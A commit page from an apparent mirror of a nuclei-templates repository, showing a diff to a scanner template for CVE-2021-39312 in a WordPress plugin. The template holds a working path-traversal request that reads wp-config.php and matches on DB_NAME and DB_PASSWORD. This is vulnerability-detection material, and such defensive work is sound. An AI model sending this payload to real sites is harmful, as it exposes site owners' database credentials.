daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2021-39312.yaml

patch-1
Prince Chaddha 2022-05-03 01:05:45 +05:30 committed by GitHub
parent 101f0e4607
commit e279027adc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
cves/2021/CVE-2021-39312.yaml
View File

@ -9,7 +9,7 @@ info:
reference: reference:
- https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
- https://nvd.nist.gov/vuln/detail/CVE-2021-39312 - https://nvd.nist.gov/vuln/detail/CVE-2021-39312
tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr tags: lfi,wp,wordpress,wp-plugin,unauth,lfr,cve,cve2021
requests: requests:
- raw: - raw:
@ -20,19 +20,15 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check Cookie: wordpress_test_cookie=WP%20Cookie%20check
src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
cookie-reuse: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: word
regex: part: body
words:
- "DB_NAME" - "DB_NAME"
- "DB_PASSWORD" - "DB_PASSWORD"
part: body condition: and
- type: word
part: header
words:
- 'text/html'
- type: status - type: status
status: status: